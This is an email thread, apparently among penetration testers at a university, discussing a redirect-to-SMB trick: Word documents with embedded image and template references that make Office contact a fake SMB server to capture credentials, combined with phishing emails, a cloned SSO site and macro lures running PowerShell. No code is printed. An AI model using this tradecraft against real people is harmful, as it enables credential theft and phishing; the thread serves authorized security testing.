Looks pretty cool. Great job Chuck. Even if the schools block 445 outbound that's still a finding. Part of a pen test is validating the controls put in place. This is a great way to do that for outbound SMB.

Some malware authors starting to go back to macros in office documents. They trick the user into enabling macros by saying the document is encrypted and the view the document the must click the button to enable macros. When they do that they can execute their malware. We could use the same trick to execute a powershell script.

On Sun, Jul 5, 2015 at 9:19 PM -0700, "Chuck Kimber" <chuck.kimber@usu.edumailto:chuck.kimber@usu.edu> wrote:

Okay, so I got this to work, with a docx file. It would work with any of the MS .blahX files though, which are just zipped up xml, images and whatever else went into your document, spreadsheet, presentation, whatever.

This .docx has two references to the fake smb daemon, running on Kali 1, just to be sure. There is an embedded image on the file and an internal reference to a template (.dotx - you'll notice word searching for it at the Kali 1 address, on startup) that are both said to be on the Kali box. They don't alert AV at all, they are part of MS's open spec afterall, but I've noticed they don't work from Office 365 or Google Apps. Also Abiword and Libre Office seem to ignore the references. If someone wants to test it on MS Office for Mac, I'd be curious to see what happens there. ...I guess I haven't tried openOffice yet either.

This should be a pretty effective tool for both phish and switchblade type operations. Not as cool as popping a reverse shell, but it should give a nice toehold somewhere and no local or email AV to worry about tripping on.

Per the email Jake sent around a while ago referencing the same technique with html ( http://blog.cylance.com/redirect-to-smb ), this evil smb redirect trick should work with lots of softwares, on various OS platforms. I'm keen to take it further. I think Jon suggested embedding it in the Phish website. How cool would it be to send an embedded smb link, in an html email, with an attached .docx. Of course, put yet another embedded smb image on the SSO clone for when they get that far. If their mail reader is susceptible, you get them when they open the email. If their document reader is susceptible, you get them there. If their browser is susceptible, you nail them when they visit the site, and then of course you also get them if they login at the SSO clone. Run three different fake smb daemons on the Kali boxes and we can quantify which method brought them to us.

I've already run into a few of the simple remediation methods for this (block outbound 445) but I'm hoping a few people will be on laptops and tablets and outside the institution's network when they try. Of course once onsite it will be interesting to do again just to see how segmented the internal networks are.

The attached document is what I have so far. Be very careful opening it in a non-test environment. Not that I'm going to try to crack anything we get, but you know, just be careful with it.

FWIW,

Chuck

On Wed, Jun 3, 2015 at 9:59 PM, Chuck Kimber <chuck.kimber@usu.edumailto:chuck.kimber@usu.edu> wrote: Oh... Tomorrows planned Phish begs for this! See code to make it happen at the bottom of the article.

https://www.trustwave.com/Resources/SpiderLabs-Blog/Adventures-in-Social-Eng...